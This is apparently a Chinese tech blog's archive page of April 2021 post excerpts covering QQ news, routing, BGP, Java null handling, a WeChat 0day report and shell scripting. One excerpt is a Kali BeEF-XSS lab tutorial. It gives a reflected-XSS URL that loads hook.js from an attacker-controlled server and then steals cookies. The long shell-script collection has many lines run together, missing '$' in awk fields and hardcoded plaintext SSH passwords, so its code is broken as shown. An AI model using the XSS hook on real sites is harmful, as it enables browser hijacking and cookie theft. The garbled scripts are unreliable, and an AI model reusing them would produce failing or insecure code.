网站首页 发表在 2021年04月 的所有文章

  • QQ群付费入群功能将于4月14日12点起停止服务

    QQ群付费入群功能将于4月14日12点起停止服务 今日,腾讯QQ在群帮助页面发布公告:宣布QQ群付费入群即将停止服务。 官方表示,由于运营策略调整,自2021年4月14日12点起,QQ付费入群功能将停止服务,之后将不再支持设置加群方式为“付费入群”。  据了解,QQ付费入群功能于2016年正式开通,申请入群的用户,需要向群主支付一定的加群费用才能入群,付费金额在1-20元范围内的整数,值得一提的是付费入群无需验证,支付费用后即可入群,不需群主或管理员审核。 腾讯当时表示,这种付费加群的方式适合资源分享、教程、学习等类型的群,用户加群的费用会在次日进入“群主钱包”中。 付费加群功能也对QQ群有一定的要求:需要群等级≥LV2,群信用星级≥5 星,群主 QQ 等级≥LV12。 说实在的,付费加群功能取消后会给那些付费群里分享资料的小伙伴们带来更多困难,加个群还要去先加群主给钱才能进群! 再一个网络骗子这么多,谁知道给钱了会不会让自己进群呢!...

    2021-04-17 770
  • 默认路由是什么,凭什么它就行?

    看资料就是说路由表没有就发给默认路由,路由表没有不是正常情况吗?默认路由到底是什么?往外发是哪里?是上一级路由吗?一直到运营商的路由服务器吗?   0.0.0.0/0就是默认路由,它指向的是默认网关,即Default Gateway。为了解释清楚这几个字,讲个小故事吧。 有一天梁思申怎么也上不了网,于是给宋运辉打电话请求帮忙。宋运辉到了一看,呀,你的无线路由器没有开啊,那怎么上网啊? 梁思申抿嘴一笑,宋运辉将无线路由器的电源打开。过了几分钟,路由器启动完毕,梁思申的电脑就可以上网了。 梁思申:宋大厂长,教教我一点IT知识呗,下次遇到网络问题,我自己就可以解决了。 宋运辉:这还不简单,无线路由器家庭网络的网关(Default Gateway)。家里的电脑、IPAD、手机统统要通过这个网关与Internet通信。你把网关的电源关闭了,那你还怎么上网呢? 梁思申:懂了。听说每个电脑还需要一个IP地址才可以上网,那又是怎么回事呢? 宋运辉:你家里那么多手机、电脑,没有IP地址怎么区分每个设备呢? 梁思申:好像是的。那每一个电脑的IP地址又是怎么来的呢? 宋运辉:无线路由器内部运行一个程序叫DHCP服务器,只要无线连接上它,就可以给电脑动态分配一个IP地址以及其它上网信息。你的电脑获得的IP信息如下:  IP地址 =10.1.1.2 网络掩码 =255.255.255.0 默认网关 =10.1.1.1 DNS服务器 =10.1.1.1  你的电脑也不是吃素的,它会根据以上信息生成4条路由表条目:  10.1.1.2 255.255.255.255    本地链路(下一跳)   ---- >  我自己 10.1.1.0 255.255.255.0         本地链路(下一跳)  ----- >  局域网,包括网关 0.0.0.0   0.0.0.0                     10.1.1.1 (下一跳)   ------>  互联网 255.255.255.255 255.255.255.255  本地链路(下一跳)   ------>  广播地址,局域网所有主机,包括自己  梁思申:这个路由表看起来好难啊,解释解释呗。 宋运辉: Ping 10.1.1.2 时,使用路由1,这很好理解,自己与自己的本地通信。 Ping 10.1.1.1 时,使用路由2,同一网段的通信。 Ping 8.8.8.8 时,使用路由3,即默认路由,不同网段的通信。即你的主机与8.8.8.8主机不在一个网段。 Ping 255.255.255.255 时,使用路由4,广播通信,按照规则,这个网段(10.1.1.0/24)的主机都应该回复你,包括自己的主机。   梁思申:好像明白了。每次通信采用什么路由条目,是根据目的IP与路由条目的匹配度,匹配度越长的,越优先使用。如果没有匹配到,那么就使用0.0.0.0/0这条默认路由,做为最后的救命稻草,对吗? 宋运辉:看来你的小脑袋瓜不笨啊,一教就会!那我来考考你,如果DHCP服务器给你的电脑分配的IP参数少了一个信息,默认网关没有分配,你的电脑还能访问互联网吗? 梁思申:那就不能了。我的电脑没有了这条默认路由(0.0.0.0/0)。 宋运辉:很好。那电脑没有默认路由了,会怎么处理上网的报文呢?  梁思申:我猜猜,应该全部被扔了? 宋运辉:回答正确!再考你一个问题,你发现路由3与其它几条路由相比,是否有点另类? 梁思申:路由3 的下一跳和别的路由不一样。路由3 的下一跳 = 10.1.1.1,这个10.1.1.1应该就是路由器的IP地址,对吗? 宋运辉:是的。意思是当你Ping 8.8.8.8 这条命令产生的报文,需要发给网关10.1.1.1。 梁思申:Ping命令产生的报文,目的IP = 8.8.8.8, 源IP =10.1.1.2,那怎样才能将这个IP报文发给网关10.1.1.1呢? 宋运辉:这里有一个小花招。如果你的电脑将目的IP 修改为10.1.1.1, 那是可以将报文发给网关10.1.1.1。可是那不就相当于在 Ping 10.1.1.1了吗?并不是Ping 8.8.8.8的,对吗? 为了解决这个小难题,你的电脑只要将目的MAC,填写为网关的MAC地址即可。 所以你的电脑需要发ARP广播,请求网关10.1.1.1的MAC地址。获得了网关的MAC地址之后,一个神奇的报文就诞生了。  目的MAC= 网关10.1.1.1的MAC地址 源MAC  = 10.1.1.2 的MAC地址 (梁思申的电脑MAC地址) 目的IP =8.8.8.8 源IP=10.1.1.2  (梁思申的电脑IP地址)  当这个报文被网关(无线路由器)网卡成功接收,无线路由器也要查路由表,最后也没有匹配到,那么只好使用最后的救命稻草:0.0.0.0/0,这条路由指向ISP。同理可得,将IP报文发给ISP路由器。...

    2021-04-17 736
  • 2021Kali系列 -- XSS漏洞(Beef-xss)

    简介:BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 一、安装beef-xss 输入beef-xss,提示安装,输入y 二、启动beef-xss 三、访问登陆页面: http://192.168.139.133:3000/ui/panel 四、让目标主机访问存在生成的钩子代码 http://192.168.139.129:81/dvwa/vulnerabilities/xss_r/?name=<script src="http://192.168.139.133:3000/hook.js"></script> 五、获取控制权限 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过 1、获取cookies 2、获取网页源码 3、让目标主机弹出提示信息 禁止非法,后果自负 ...

    2021-04-17 1120
  • 为什么BGP需要TCP三次握手?

    你的意思是BGP可以使用TCP,即使用TCP的封装头,用于封装BGP报文,为何要多此一举使用TCP的三次握手建立连接? 2012年有过类似的困惑。那时Cisco ASR 1000 产品开发一个新的Feature,一种新型的UDP隧道,为了检验其扩展性以及对各种报文的转发性能,需要从隧道的一端(入口)最大限度灌入IP、UDP、TCP流量。然后检查从隧道的另一端(出口)有多少流量流出来了? IP、UDP流量都没有问题,目的IP、目的端口随便填,流量都可以生成并进入隧道。(默认路由) TCP遇到了麻烦,需要提供对方的IP以及端口号。随便填了IP/端口,发现非但没有生成流量,测试仪还报错,提示连接失败。 突然才意识到TCP是基于连接的,只有本端的握手信号(第一次握手),被对方确认且收到对方握手信号(第二次握手),然后本端再确认收到对方握手信号(第三次握手)。 三次握手成功之后,本端才能生成TCP流量报文。可是脚本提供的对端IP、端口号都是不存在的,无法完成三次手,自然无法产生TCP数据流。 难道不能有一种特殊的API接口,只使用TCP的封装,不用建立TCP连接,这样就可以直接灌入TCP流量? 可是测试仪表并没有提供这个特殊的API。于是我就在网络上抓了一个TCP数据包,用脚本修改目的IP、端口号,于是就生成了TCP数据流量。 将生成的TCP流量灌入隧道入口,自然TCP流量从隧道出口流出。这些TCP流量最后到哪里去了? 丢了,它们的使命已经完成。 问题回来,BGP能否模仿我,自己生成TCP报文头,以避免TCP三次握手? 当然可以。 可是BGP自己生成的TCP封装 + BGP 报文,到达对端(Peer)的TCP/IP协议栈,谁来处理呢? 先是IP层来处理,因为二层ether type= 0x0800。 然后TCP来处理,因为IP头 Protocol = 6。 TCP将报文的源IP、目的IP、源端口、目的端口 提取出来,这四个参数输入hash()函数,得到一个hash ID,这个就是TCP连接库里的连接ID。 TCP在自己连接库没有查询到hash ID。TCP认为这是一个新建连接,可是发现报文里并没有SYN标志位,这是非法报文,丢弃并发Reset。 BGP既然选择了TCP做为自己的传输协议(运输供应商),那就把货物全权委托给自己的运输供应商。至于供应商TCP的内部运作方式,是无权干涉的,也是干涉不了的! 就凭TCP可以将字节流可靠按序送达目的地这句承诺,就可以让TCP这家供应商独领风骚多少年!不用TCP,还有更好的选择吗? ...

    2021-04-17 699
  • Java项目中存在大量判空代码,怎么解决?

    问题 为了避免空指针调用,我们经常会看到这样的语句 if (someobject != null) {     someobject.doCalc(); } 最终,项目中会存在大量判空代码,多么丑陋繁冗!如何避免这种情况?我们是否滥用了判空呢? 回答 这是初、中级程序猿经常会遇到的问题。他们总喜欢在方法中返回null,因此,在调用这些方法时,也不得不去判空。另外,也许受此习惯影响,他们总潜意识地认为,所有的返回都是不可信任的,为了保护自己程序,就加了大量的判空。 吐槽完毕,回到这个题目本身,进行判空前,请区分以下两种情况: null 是一个有效有意义的返回值(Where null is a valid response in terms of the contract; and) null是无效有误的(Where it isn’t a valid response.) 你可能还不明白这两句话的意思,不急,继续往下看,接下来将详细讨论这两种情况 先说第2种情况 null就是一个不合理的参数,就应该明确地中断程序,往外抛错误。这种情况常见于api方法。例如你开发了一个接口,id是一个必选的参数,如果调用方没传这个参数给你,当然不行。你要感知到这个情况,告诉调用方“嘿,哥们,你传个null给我做甚"。 相对于判空语句,更好的检查方式有两个 assert语句,你可以把错误原因放到assert的参数中,这样不仅能保护你的程序不往下走,而且还能把错误原因返回给调用方,岂不是一举两得。(原文介绍了assert的使用,这里省略) 也可以直接抛出空指针异常。上面说了,此时null是个不合理的参数,有问题就是有问题,就应该大大方方往外抛。 第1种情况会更复杂一些。 这种情况下,null是个”看上去“合理的值,例如,我查询数据库,某个查询条件下,就是没有对应值,此时null算是表达了“空”的概念。 这里给一些实践建议: 假如方法的返回类型是collections,当返回结果是空时,你可以返回一个空的collections(empty list),而不要返回null.这样调用侧就能大胆地处理这个返回,例如调用侧拿到返回后,可以直接print list.size(),又无需担心空指针问题。(什么?想调用这个方法时,不记得之前实现该方法有没按照这个原则?所以说,代码习惯很重要!如果你养成习惯,都是这样写代码(返回空collections而不返回null),你调用自己写的方法时,就能大胆地忽略判空) 返回类型不是collections,又怎么办呢? 那就返回一个空对象(而非null对象),下面举个“栗子”,假设有如下代码 public interface Action {   void doSomething();} public interface Parser {   Action findAction(String userInput);} 其中,Parse有一个接口FindAction,这个接口会依据用户的输入,找到并执行对应的动作。假如用户输入不对,可能就找不到对应的动作(Action),因此findAction就会返回null,接下来action调用doSomething方法时,就会出现空指针。 解决这个问题的一个方式,就是使用Null Object pattern(空对象模式) 我们来改造一下 类定义如下,这样定义findAction方法后,确保无论用户输入什么,都不会返回null对象: public class MyParser implements Parser {   private static Action DO_NOTHING = new Action() {     public void doSomething() { /* do nothing */ }   };   public Action findAction(String userInput) {     // ...     if ( /* we can't find any actions */ ) {       return DO_NOTHING;     }   } } 对比下面两份调用实例 1.冗余: 每获取一个对象,就判一次空 Parser parser = ParserFactory.getParser(); if (parser == null) {   // now what?   // this would be an example of where null isn't (or shouldn't be) a valid response } Action action = parser.findAction(someInput); if (action == null) {   // do nothing}  else {   action.doSomething(); } 2.精简 ParserFactory.getParser().findAction(someInput).doSomething(); 因为无论什么情况,都不会返回空对象,因此通过findAction拿到action后,可以放心地调用action的方法。扩展一下:Java:如何更优雅的处理空值? 其他回答精选: 如果要用equal方法,请用object<不可能为空>.equal(object<可能为空>)) 例如: 使用 "bar".equals(foo) 而不是 foo.equals("bar") Java8或者guava lib中,提供了Optional类,这是一个元素容器,通过它来封装对象,可以减少判空。不过代码量还是不少。不爽。 如果你想返回null,请停下来想一想,这个地方是否更应该抛出一个异常。 ...

    2021-04-17 1922
  • 微信被爆出存在高危0day漏洞!新版本已修复,看到尽快更新!

    微信被国内某安全团队(青藤)爆出,在电脑版微信客户端中捕获到一个高危等级的在野0day漏洞。建议3.2.1.141版本以下的用户立即更新! 此次被爆出的高危0day黑客只需要通过微信发送一个特制web链接,当用户点击链接后,微信电脑(windows)版进程wechatweb.exe会加载shellcode执行,整个过程无文件落地,无新进程产生。 也就是说当你点击了对方准备好的链接后,你就已经中招了而且不会在文件和进程上体现,比较可怕! 安全团队在检测出wechatweb.exe存在内存恶意代码,继而排查出了0day漏洞之后,在第一时间报告腾讯安全应急响应中心并协助其修复漏洞。 截止目前,该漏洞已被修复并发布了更新版本,强烈建议看到此文章的朋友们,如果你的微信电脑版本在3.2.1.141以下,请及时点击设置-关于微信-检查更新,避免因此漏洞产生任何损失! 也可以尽快扩散给身边使用微信电脑版的朋友,减小漏洞威胁! ...

    2021-04-17 730
  • 23 个非常实用的 Shell 拿来就用脚本实例

    为大家整理了23个实例,通过23个实战经典脚本实例,展示了shell脚本编程的实用技术和常见工具用法。大家只需根据自己的需求,将文中这些常见任务和可移植自动化脚本推广应用到其他类似问题上,能解决那些三天两头碰上的麻烦事。 检测两台服务器指定目录下的文件一致性 #!/bin/bash######################################检测两台服务器指定目录下的文件一致性######################################通过对比两台服务器上文件的md5值,达到检测一致性的目的 dir=/data/web b_ip=192.168.88.10 #将指定目录下的文件全部遍历出来并作为md5sum命令的参数,进而得到所有文件的md5值,并写入到指定文件中 find $dir -type f|xargs md5sum > /tmp/md5_a.txt ssh $b_ip "find $dir -type f|xargs md5sum > /tmp/md5_b.txt" scp $b_ip:/tmp/md5_b.txt /tmp #将文件名作为遍历对象进行一一比对for f in `awk '{print 2} /tmp/md5_a.txt'` do#以a机器为标准,当b机器不存在遍历对象中的文件时直接输出不存在的结果if grep -qw "$f" /tmp/md5_b.txt then md5_a=`grep -w "$f" /tmp/md5_a.txt|awk '{print 1}'` md5_b=`grep -w "$f" /tmp/md5_b.txt|awk '{print 1}'` #当文件存在时,如果md5值不一致则输出文件改变的结果if [ $md5_a != $md5_b ] thenecho "$f changed."fielseecho "$f deleted."fidone 定时清空文件内容,定时记录文件大小 #!/bin/bash#################################################################每小时执行一次脚本(任务计划),当时间为0点或12点时,将目标目录下的所有文件内#容清空,但不删除文件,其他时间则只统计各个文件的大小,一个文件一行,输出到以时#间和日期命名的文件中,需要考虑目标目录下二级、三级等子目录的文件################################################################ logfile=/tmp/`date +%H-%F`.log n=`date +%H` if [ $n -eq 00 ] || [ $n -eq 12 ] then#通过for循环,以find命令作为遍历条件,将目标目录下的所有文件进行遍历并做相应操作for i in `find /data/log/ -type f` dotrue > $idoneelsefor i in `find /data/log/ -type f` do du -sh $i >> $logfiledonefi 检测网卡流量,并按规定格式记录在日志中 #!/bin/bash########################################################检测网卡流量,并按规定格式记录在日志中#规定一分钟记录一次#日志格式如下所示:#2019-08-12 20:40#ens33 input: 1234bps#ens33 output: 1235bps######################################################3while : do#设置语言为英文,保障输出结果是英文,否则会出现bug LANG=en logfile=/tmp/`date +%d`.log #将下面执行的命令结果输出重定向到logfile日志中 exec >> $logfile date +"%F %H:%M"#sar命令统计的流量单位为kb/s,日志格式为bps,因此要*1000*8 sar -n DEV 1 59|grep Average|grep ens33|awk '{print $2,"\t","input:","\t",$5*1000*8,"bps","\n",$2,"\t","output:","\t",$6*1000*8,"bps"}' echo "####################"#因为执行sar命令需要59秒,因此不需要sleep done 计算文档每行出现的数字个数,并计算整个文档的数字总数 #!/bin/bash##########################################################计算文档每行出现的数字个数,并计算整个文档的数字总数#########################################################使用awk只输出文档行数(截取第一段) n=`wc -l a.txt|awk '{print $1}'` sum=0 #文档中每一行可能存在空格,因此不能直接用文档内容进行遍历for i in `seq 1 $n` do#输出的行用变量表示时,需要用双引号 line=`sed -n "$i"p a.txt` #wc -L选项,统计最长行的长度 n_n=`echo $line|sed s'/[^0-9]//'g|wc -L` echo $n_n sum=$[$sum+$n_n] doneecho "sum:$sum" 杀死所有脚本 #!/bin/bash################################################################ #有一些脚本加入到了cron之中,存在脚本尚未运行完毕又有新任务需要执行的情况, #导致系统负载升高,因此可通过编写脚本,筛选出影响负载的进程一次性全部杀死。 ################################################################ ps aux|grep 指定进程名|grep -v grep|awk '{print $2}'|xargs kill -9 从FTP服务器下载文件 #!/bin/bashif [ $# -ne 1 ]; then     echo "Usage: $0 filename"fi dir=$(dirname $1) file=$(basename $1) ftp -n -v << EOF   # -n 自动登录 open 192.168.1.10  # ftp服务器 user admin password binary   # 设置ftp传输模式为二进制,避免MD5值不同或.tar.gz压缩包格式错误cd $dir get "$file" EOF 连续输入5个100以内的数字,统计和、最小和最大 #!/bin/bash COUNT=1 SUM=0 MIN=0 MAX=100 while [ $COUNT -le 5 ]; do     read -p "请输入1-10个整数:" INT     if [[ ! $INT =~ ^[0-9]+$ ]]; then         echo "输入必须是整数!"         exit 1     elif [[ $INT -gt 100 ]]; then         echo "输入必须是100以内!"         exit 1     fi     SUM=$(($SUM+$INT))     [ $MIN -lt $INT ] && MIN=$INT     [ $MAX -gt $INT ] && MAX=$INT     let COUNT++ doneecho "SUM: $SUM"echo "MIN: $MIN"echo "MAX: $MAX" 用户猜数字 #!/bin/bash  # 脚本生成一个 100 以内的随机数,提示用户猜数字,根据用户的输入,提示用户猜对了,# 猜小了或猜大了,直至用户猜对脚本结束。# RANDOM 为系统自带的系统变量,值为 0‐32767的随机数# 使用取余算法将随机数变为 1‐100 的随机数num=$[RANDOM%100+1]echo "$num" # 使用 read 提示用户猜数字# 使用 if 判断用户猜数字的大小关系:‐eq(等于),‐ne(不等于),‐gt(大于),‐ge(大于等于),# ‐lt(小于),‐le(小于等于)while :do     read -p "计算机生成了一个 1‐100 的随机数,你猜: " cai    if [ $cai -eq $num ]    then        echo "恭喜,猜对了"           exit        elif [ $cai -gt $num ]        then            echo "Oops,猜大了"         else            echo "Oops,猜小了"     fidone 监测Nginx访问日志502情况,并做相应动作 假设服务器环境为lnmp,近期访问经常出现502现象,且502错误在重启php-fpm服务后消失,因此需要编写监控脚本,一旦出现502,则自动重启php-fpm服务。 #场景:#1.访问日志文件的路径:/data/log/access.log#2.脚本死循环,每10秒检测一次,10秒的日志条数为300条,出现502的比例不低于10%(30条)则需要重启php-fpm服务#3.重启命令为:/etc/init.d/php-fpm restart#!/bin/bash########################################################### #监测Nginx访问日志502情况,并做相应动作 ########################################################### log=/data/log/access.log N=30 #设定阈值while : do  #查看访问日志的最新300条,并统计502的次数     err=`tail -n 300 $log |grep -c '502" '`  if [ $err -ge $N ]  then  /etc/init.d/php-fpm restart 2> /dev/null  #设定60s延迟防止脚本bug导致无限重启php-fpm服务      sleep 60  fi  sleep 10 done 将结果分别赋值给变量 应用场景:希望将执行结果或者位置参数赋值给变量,以便后续使用。 方法1: for i in $(echo "4 5 6"); do    eval a$i=$idoneecho $a4 $a5 $a6 方法2:将位置参数192.168.1.1{1,2}拆分为到每个变量 num=0 for i in $(eval echo $*);do   #eval将{1,2}分解为1 2    let num+=1    eval node${num}="$i"doneecho $node1 $node2 $node3# bash a.sh 192.168.1.1{1,2} 192.168.1.11 192.168.1.12 方法3: arr=(4 5 6) INDEX1=$(echo ${arr[0]}) INDEX2=$(echo ${arr[1]}) INDEX3=$(echo ${arr[2]}) 批量修改文件名 示例: # touch article_{1..3}.html# ls article_1.html  article_2.html  article_3.html 目的:把article改为bbs 方法1: for file in $(ls *html); do     mv $file bbs_${file#*_}     # mv $file $(echo $file |sed -r 's/.*(_.*)/bbs\1/')     # mv $file $(echo $file |echo bbs_$(cut -d_ -f2) done 方法2: for file in $(find . -maxdepth 1 -name "*html"); do      mv $file bbs_${file#*_} done 方法3: # rename article bbs *.html 把一个文档前五行中包含字母的行删掉,同时删除6到10行包含的所有字母 1)准备测试文件,文件名为2.txt 第1行1234567不包含字母 第2行56789BBBBBB 第3行67890CCCCCCCC 第4行78asdfDDDDDDDDD 第5行123456EEEEEEEE 第6行1234567ASDF 第7行56789ASDF 第8行67890ASDF 第9行78asdfADSF 第10行123456AAAA 第11行67890ASDF 第12行78asdfADSF 第13行123456AAAA 2)脚本如下: #!/bin/bash###############################################################把一个文档前五行中包含字母的行删掉,同时删除6到10行包含的所有字母############################################################## sed -n '1,5'p 2.txt |sed '/[a-zA-Z]/'d sed -n '6,10'p 2.txt |sed s'/[a-zA-Z]//'g sed -n '11,$'p 2.txt #最终结果只是在屏幕上打印结果,如果想直接更改文件,可将输出结果写入临时文件中,再替换2.txt或者使用-i选项 统计当前目录中以.html结尾的文件总大 方法1: # find . -name "*.html" -exec du -k {} \; |awk '{sum+=$1}END{print sum}' 方法2: for size in $(ls -l *.html |awk '{print $5}'); do     sum=$(($sum+$size)) doneecho $sum 扫描主机端口状态 #!/bin/bash HOST=$1 PORT="22 25 80 8080"for PORT in $PORT; do     if echo &>/dev/null > /dev/tcp/$HOST/$PORT; then         echo "$PORT open"     else         echo "$PORT close"     fidone 用shell打印示例语句中字母数小于6的单词 #示例语句:#Bash also interprets a number of multi-character options.#!/bin/bash###############################################################shell打印示例语句中字母数小于6的单词##############################################################for s in Bash also interprets a number of multi-character options. do  n=`echo $s|wc -c`  if [ $n -lt 6 ]  then  echo $s  fi done 输入数字运行相应命令 #!/bin/bash###############################################################输入数字运行相应命令##############################################################echo "*cmd menu* 1-date 2-ls 3-who 4-pwd 0-exit "while : do#捕获用户键入值  read -p "please input number :" n  n1=`echo $n|sed s'/[0-9]//'g` #空输入检测   if [ -z "$n" ]  then  continue  fi#非数字输入检测   if [ -n "$n1" ]  then  exit 0  fi  breakdonecase $n in  1)  date  ;;  2)  ls  ;;  3)  who  ;;  4)  pwd  ;;  0)  break  ;;     #输入数字非1-4的提示  *)  echo "please input number is [1-4]"esac Expect实现SSH免交互执行命令 Expect是一个自动交互式应用程序的工具,如telnet,ftp,passwd等。 需先安装expect软件包。 方法1:EOF标准输出作为expect标准输入 #!/bin/bash USER=root PASS=123.com IP=192.168.1.120 expect << EOF set timeout 30 spawn ssh $USER@$IP    expect {     "(yes/no)" {send "yes\r"; exp_continue}     "password:" {send "$PASS\r"} } expect "$USER@*"  {send "$1\r"} expect "$USER@*"  {send "exit\r"} expect eof EOF 方法2: #!/bin/bash USER=root PASS=123.com IP=192.168.1.120 expect -c "     spawn ssh $USER@$IP     expect {         \"(yes/no)\" {send \"yes\r\"; exp_continue}         \"password:\" {send \"$PASS\r\"; exp_continue}         \"$USER@*\" {send \"df -h\r exit\r\"; exp_continue}     }" 方法3:将expect脚本独立出来 登录脚本: # cat login.exp#!/usr/bin/expectset ip [lindex $argv 0] set user [lindex $argv 1] set passwd [lindex $argv 2] set cmd [lindex $argv 3] if { $argc != 4 } { puts "Usage: expect login.exp ip user passwd"exit 1 } set timeout 30 spawn ssh $user@$ip expect {     "(yes/no)" {send "yes\r"; exp_continue}     "password:" {send "$passwd\r"} } expect "$user@*"  {send "$cmd\r"} expect "$user@*"  {send "exit\r"} expect eof 执行命令脚本:写个循环可以批量操作多台服务器 #!/bin/bash HOST_INFO=user_info.txt for ip in $(awk '{print $1}' $HOST_INFO) do     user=$(awk -v I="$ip" 'I==$1{print $2}' $HOST_INFO)     pass=$(awk -v I="$ip" 'I==$1{print $3}' $HOST_INFO)     expect login.exp $ip $user $pass $1done Linux主机SSH连接信息: # cat user_info.txt 192.168.1.120 root 123456 创建10个用户,并分别设置密码,密码要求10位且包含大小写字母以及数字,最后需要把每个用户的密码存在指定文件中 #!/bin/bash###############################################################创建10个用户,并分别设置密码,密码要求10位且包含大小写字母以及数字#最后需要把每个用户的密码存在指定文件中#前提条件:安装mkpasswd命令###############################################################生成10个用户的序列(00-09)for u in `seq -w 0 09` do  #创建用户  useradd user_$u  #生成密码  p=`mkpasswd -s 0 -l 10`  #从标准输入中读取密码进行修改(不安全)  echo $p|passwd --stdin user_$u  #常规修改密码  echo -e "$p\n$p"|passwd user_$u  #将创建的用户及对应的密码记录到日志文件中  echo "user_$u $p" >> /tmp/userpassword done 监控httpd的进程数,根据监控情况做相应处理 #!/bin/bash################################################################################################################################需求:#1.每隔10s监控httpd的进程数,若进程数大于等于500,则自动重启Apache服务,并检测服务是否重启成功#2.若未成功则需要再次启动,若重启5次依旧没有成功,则向管理员发送告警邮件,并退出检测#3.如果启动成功,则等待1分钟后再次检测httpd进程数,若进程数正常,则恢复正常检测(10s一次),否则放弃重启并向管理员发送告警邮件,并退出检测################################################################################################################################计数器函数 check_service() {  j=0  for i in `seq 1 5`   do  #重启Apache的命令  /usr/local/apache2/bin/apachectl restart 2> /var/log/httpderr.log     #判断服务是否重启成功  if [ $? -eq 0 ]  then  break  else  j=$[$j+1]  fi     #判断服务是否已尝试重启5次  if [ $j -eq 5 ]  then  mail.py  exit  fi  done  } while : do  n=`pgrep -l httpd|wc -l`  #判断httpd服务进程数是否超过500  if [ $n -gt 500 ]  then  /usr/local/apache2/bin/apachectl restart  if [ $? -ne 0 ]  then  check_service  else  sleep 60  n2=`pgrep -l httpd|wc -l`  #判断重启后是否依旧超过500              if [ $n2 -gt 500 ]  then   mail.py  exit  fi  fi  fi  #每隔10s检测一次  sleep 10 done 批量修改服务器用户密码 Linux主机SSH连接信息:旧密码 # cat old_pass.txt  192.168.18.217  root    123456     22 192.168.18.218  root    123456     22 内容格式:IP User Password Port SSH远程修改密码脚本:新密码随机生成 https://www.linuxprobe.com/books #!/bin/bash OLD_INFO=old_pass.txt NEW_INFO=new_pass.txt for IP in $(awk '/^[^#]/{print $1}' $OLD_INFO); do     USER=$(awk -v I=$IP 'I==$1{print $2}' $OLD_INFO)     PASS=$(awk -v I=$IP 'I==$1{print $3}' $OLD_INFO)     PORT=$(awk -v I=$IP 'I==$1{print $4}' $OLD_INFO)     NEW_PASS=$(mkpasswd -l 8)  # 随机密码     echo "$IP   $USER   $NEW_PASS   $PORT" >> $NEW_INFO     expect -c "     spawn ssh -p$PORT $USER@$IP     set timeout 2     expect {         \"(yes/no)\" {send \"yes\r\";exp_continue}         \"password:\" {send \"$PASS\r\";exp_continue}         \"$USER@*\" {send \"echo \'$NEW_PASS\' |passwd --stdin $USER\r exit\r\";exp_continue}     }"done 生成新密码文件: # cat new_pass.txt  192.168.18.217  root    n8wX3mU%      22 192.168.18.218  root    c87;ZnnL      22 iptables自动屏蔽访问网站频繁的IP 场景:恶意访问,安全防范 1)屏蔽每分钟访问超过200的IP 方法1:根据访问日志(Nginx为例) #!/bin/bash DATE=$(date +%d/%b/%Y:%H:%M) ABNORMAL_IP=$(tail -n5000 access.log |grep $DATE |awk '{a[$1]++}END{for(i in a)if(a[i]>100)print i}') #先tail防止文件过大,读取慢,数字可调整每分钟最大的访问量。awk不能直接过滤日志,因为包含特殊字符。for IP in $ABNORMAL_IP; do     if [ $(iptables -vnL |grep -c "$IP") -eq 0 ]; then         iptables -I INPUT -s $IP -j DROP     fidone 方法2:通过TCP建立的连接 #!/bin/bash ABNORMAL_IP=$(netstat -an |awk '$4~/:80$/ && $6~/ESTABLISHED/{gsub(/:[0-9]+/,"",$5);{a[$5]++}}END{for(i in a)if(a[i]>100)print i}') #gsub是将第五列(客户端IP)的冒号和端口去掉for IP in $ABNORMAL_IP; do     if [ $(iptables -vnL |grep -c "$IP") -eq 0 ]; then         iptables -I INPUT -s $IP -j DROP     fidone 2)屏蔽每分钟SSH尝试登录超过10次的IP 方法1:通过lastb获取登录状态: #!/bin/bash DATE=$(date +"%a %b %e %H:%M") #星期月天时分  %e单数字时显示7,而%d显示07 ABNORMAL_IP=$(lastb |grep "$DATE" |awk '{a[$3]++}END{for(i in a)if(a[i]>10)print i}') for IP in $ABNORMAL_IP; do     if [ $(iptables -vnL |grep -c "$IP") -eq 0 ]; then         iptables -I INPUT -s $IP -j DROP     fidone 方法2:通过日志获取登录状态 #!/bin/bash DATE=$(date +"%b %d %H") ABNORMAL_IP="$(tail -n10000 /var/log/auth.log |grep "$DATE" |awk '/Failed/{a[$(NF-3)]++}END{for(i in a)if(a[i]>5)print i}')"for IP in $ABNORMAL_IP; do     if [ $(iptables -vnL |grep -c "$IP") -eq 0 ]; then         iptables -A INPUT -s $IP -j DROP         echo "$(date +"%F %T") - iptables -A INPUT -s $IP -j DROP" >>~/ssh-login-limit.log     fidone 根据web访问日志,封禁请求量异常的IP,如IP在半小时后恢复正常,则解除封禁 #!/bin/bash#####################################################################################根据web访问日志,封禁请求量异常的IP,如IP在半小时后恢复正常,则解除封禁#################################################################################### logfile=/data/log/access.log #显示一分钟前的小时和分钟 d1=`date -d "-1 minute" +%H%M` d2=`date +%M` ipt=/sbin/iptables ips=/tmp/ips.txt block() {  #将一分钟前的日志全部过滤出来并提取IP以及统计访问次数  grep '$d1:' $logfile|awk '{print $1}'|sort -n|uniq -c|sort -n > $ips  #利用for循环将次数超过100的IP依次遍历出来并予以封禁  for i in `awk '$1>100 {print $2}' $ips`  do  $ipt -I INPUT -p tcp --dport 80 -s $i -j REJECT  echo "`date +%F-%T` $i" >> /tmp/badip.log  done } unblock() {  #将封禁后所产生的pkts数量小于10的IP依次遍历予以解封  for a in `$ipt -nvL INPUT --line-numbers |grep '0.0.0.0/0'|awk '$2<10 {print $1}'|sort -nr`  do   $ipt -D INPUT $a  done  $ipt -Z } #当时间在00分以及30分时执行解封函数if [ $d2 -eq "00" ] || [ $d2 -eq "30" ]  then  #要先解再封,因为刚刚封禁时产生的pkts数量很少  unblock  block  else  block fi 判断用户输入的是否为IP地址 方法1: #!/bin/bashfunction check_ip(){     IP=$1     VALID_CHECK=$(echo $IP|awk -F. '$1< =255&&$2<=255&&$3<=255&&$4<=255{print "yes"}')     if echo $IP|grep -E "^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$">/dev/null; then         if [ $VALID_CHECK == "yes" ]; then             echo "$IP available."         else             echo "$IP not available!"         fi     else         echo "Format error!"     fi } check_ip 192.168.1.1 check_ip 256.1.1.1 方法2: #!/bin/bashfunction check_ip(){     IP=$1     if [[ $IP =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then         FIELD1=$(echo $IP|cut -d. -f1)         FIELD2=$(echo $IP|cut -d. -f2)         FIELD3=$(echo $IP|cut -d. -f3)         FIELD4=$(echo $IP|cut -d. -f4)         if [ $FIELD1 -le 255 -a $FIELD2 -le 255 -a $FIELD3 -le 255 -a 